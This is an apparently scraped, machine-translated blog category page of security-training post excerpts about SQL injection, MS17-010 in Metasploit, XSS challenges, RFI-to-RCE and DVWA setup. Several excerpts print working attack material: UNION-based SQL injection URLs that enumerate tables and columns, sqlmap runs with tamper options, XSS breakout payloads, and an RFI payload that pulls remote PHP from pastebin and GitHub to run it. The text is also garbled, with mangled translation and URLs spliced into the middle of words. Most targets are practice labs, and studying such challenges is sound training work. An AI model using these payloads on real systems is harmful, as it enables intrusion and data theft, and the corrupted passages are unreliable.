Category:Information Security

  • Notes on Web Security Course: analysis and utilization of SQL vulnerability

    Time:2020-3-28

    3-1SQLLanguage foundation 3-2ACCESSManual injection What does and1 = 1 mean: enter the database to query information and determine whether there is an injection point. Exists (select * from admin): query statement   3-6 MySQL manual injection     In a logical expression, and takes precedence over or. SqlmapInstallation and setup   If uppercase is the […]

  • MS17 in MSF

    Time:2020-3-27

    1. Auxiliary / scanner / SMB / SMB ﹐ MS17 ﹐ 010 / / scan detection vulnerability auxiliary module Scanning results show that the vulnerability exists in 2, 3 and 4 hosts! 2. Auxiliary / admin / SMB / MS17? Command / / scan the 445 online host MS17? 010 to exploit the 445 SMB […]

  • 7 common XSS

    Time:2020-3-26

    1. URL Reflection We can add our own XSS vector / payload when the URL is reflected in the source code in some way. For PHP pages, you can use the slash character (/) to add anything after the page name http://brutelogic.com.br/xss.php/”>   Leading (“>”) is required to break through the current tag in order […]

  • Multi Reflection (Pro Only)

    Time:2020-3-25

    Case 14 – Double Injection in HTML Context with Double Quotes https://brutelogic.com.br/multi/double-html.php?p=”   Case 15 – Double Injection in Mixed Context (HTML + JS) with Default Quotes   https://brutelogic.com.br/multi/double-mixed.php?p=”   Case 16 – Quoteless Inline Double Injection in JS variables  https://brutelogic.com.br/multi/js-inline.php?p=;alert(1)//\     Case 17 – Quoteless Inline Double Injection in JS object https://brutelogic.com.br/multi/js-object.php?p=};alert(1)//\ Case […]

  • DOM-based XSS Test Cases

    Time:2020-3-24

    Case 23 – DOM Injection via URL parameter (by server + client) https://brutelogic.com.br/dom/dom.php?p=Hello. https://brutelogic.com.br/dom/dom.php?p=   Case 24 – DOM Injection via URL Parameter (Document Sink) https://brutelogic.com.br/dom/sinks.html?name=KNOXSS’ https://brutelogic.com.br/dom/sinks.html?name=   Case 25 – DOM Injection via Open Redirection (Location Sink) https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)   Case 26 – DOM Injection via URL Parameter (Ehttps://www.cnblogs.com/hack404/p/xecution Sink) https://brutelogic.com.br/dom/sinks.html?indehttps://www.cnblogs.com/hack404/p/x=’NASDAQ’ https://brutelogic.com.br/dom/sinks.html?indehttps://www.cnblogs.com/hack404/p/x=’NASDAQ’;alert(1);   Reference resources: […]

  • RFI to RCE challenge

    Time:2020-3-23

      http://www.zixem.altervista.org/RCE/level1.php     Construct payload: https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SRE/master/test.php https://zixem.altervista.org/RCE/level1.php?page=http://pastebin.com/raw.php?i=DDSuhHcu   https://zixem.altervista.org/RCE/level1.php?page=http://@pastebin.com/raw.php?i=DDSuhHcu  

  • XSS Challenges xss-quiz.int21h.jp

    Time:2020-3-22

    Summary: https://xss-quiz.int21h.jp/   Stage #1 payload: alert(document.domain);   Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 Try:alert(document.domain);unsuccessful Input is not closed payload: “>   Stage #3 http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d Note: because all of them are post requests, P1 variable does not exist cross station, P2 variable has problems, so packet capturing is needed ;javascript:alert(document.domain);//  p2=alert(document.domain);   Stage #4 http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e P3 is a hidden […]

  • Challenges-XSS

    Time:2020-3-21

    https://alf.nu/alert1   warmup   adobe   JSON  

  • Google XSS Challenge

    Time:2020-3-20

      https://xss-game.appspot.com/level1     https://xss-game.appspot.com/level1 payload: https://xss-game.appspot.com/level2 Filtered outKey words

  • Vulnerability test of manual injection after SQL filtering characters (question 1)

    Time:2020-3-18

      https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe   Analysis topic, belongs to time blind injection, in this case, usually use sqlmap to inject directly, manual syntax is too complex!!!   sqlmap -u “http://219.153.49.228:49703/new_list.php?id=1” –tamper charencode,equaltolike,space2comment –current-db ╰─ sqlmap -u “http://219.153.49.228:49703/new_list.php?id=1” –tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup –tables   ╰─ sqlmap -u “http://219.153.49.228:49703/new_list.php?id=1” –tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member –columns ╰─ sqlmap -u […]

  • SQL injection penetration practice

    Time:2020-3-17

    Summary:   Determine injection point: http://www.xxxxx.com/page.php?pid=42 and 1=1 #true     http://www.xxxxx.com/page.php?pid=42 and 1=2 #false   Number of columns in guessing table http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+06 #true http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+07 #false   Burst field http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,2,3,4,5,6   Burst database information http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6   Guessing table http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6 Guess the fields of the table http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6   Get field […]

  • Win10 DVWA download installation configuration (novice learning penetration)

    Time:2020-3-16

    The computer has been reinstalled. You need to reinstall the learning environment DVWA of penetration test. Take this opportunity to tell you about the installation process of DVWA. Because different computer configurations and environments are different, I have installed the DVWA on my computer at one time according to my installation tutorial. If you encounter […]